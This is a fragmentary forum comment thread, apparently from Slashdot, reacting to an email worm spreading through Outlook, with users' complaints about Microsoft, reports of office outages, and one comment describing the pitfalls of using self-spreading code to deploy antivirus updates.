Re:Total Cost of ownership if Outlook/Exchange (Score:2)
How anyone could write an application with such a feature is beyond me. Why anyone would willingly install the thing on their machine is also beyond me. Which brings me back to the point of my original post. System admins and IT managers need to be made well aware of what they are getting into when they base their corporate email system on this crap. I work for a large investment bank and our email has been down for over half a day now because of this thing. I can't even guess how much it's costing the firm.
Re:Unix won. (Score:2)
Little do they know that the EMC disk arrays that handle the mainframe storage are all Unix boxes themselves.
Re:Linux version (Score:2)
Re: (Score:2)
FAX machines vulnerable! (Score:2)
This trojan will propagate to FAX machines, if the machine is a contact in the Outlook address book.
It doesn't just eat bandwidth, it eats paper and phone connections too.
Re:Fast spread, but better handled? (Score:3)
You mean they took the obvious step of ceasing to use software whose crappy design makes it specifically vulnerable to this sort of virus? Or do you mean they just engaged in damage control and will still be whacked the next time such a virus comes around?
No software should be able to edit a registry file or its equivalent without specific permission from an informed user. Period.
Re:Next step: AutoEducation.exe (Score:2)
BE CAREFUL-- a company I used to work for used viral techniques for automatically installing/updating antivirus software and quickly gave up on the idea. It's too easy to "spread" to a system where you don't want to have the fix applied.
A better solution is to run it as a non-viral application as part of the user's network login.
If you're dead-set on using viral techniques make sure that the application checks a central server for a blacklist of systems to refrain from infecting, and a whitelist of network addresses to ONLY infect. This will allow you to control its spread. Also-- be sure to include a self-destruct/undo capability triggered by this same server, and include an unambigious string that is easy to add to your virus scanners should it "get away" from you.
Again, it's really better to avoid doing this at all. Been there.
Re:Total Cost of ownership if Outlook/Exchange (Score:2)
We have 600 PC's at the site I support. So far not one infected computer. I'm certainly glad we're running Notes. Otherwise I'd be running around to 600 PC's today.
There are users at some of the company's other sites though that have the virus but it appears to be a very small number. As you pointed out, our users were able to receive the e-mail, but it didn't propogate. Outlook can't send e-mail over our network.
numb
MP3s... (Score:3)
MS friendly news (Score:5)
What do you think is the % of people who will quit using Outlook after being hit by this? 5% 1% 0%? If the press would do its job, namely informing and protecting the layman we'd see a lot less Outlook users. Instead we get 'don't open this mail, which is useless when the preview pane is always on' and 'all is well, download new virus updates, MS is still your friend.'
Quote from Microsoft (Score:5)
I didn't realize Microsoft was in Egypt, because this guy's clearly in denial.
I wonder if anybody is going to bring a class action suit against Microsoft for not closing this security hole back when Melissa came out.
Love Bytes, Love Stings? (Score:3)
Of course, this could mean an arrest in 24 hours.
*Carlos: Exit Stage Right*
"Geeks, Where would you be without them?"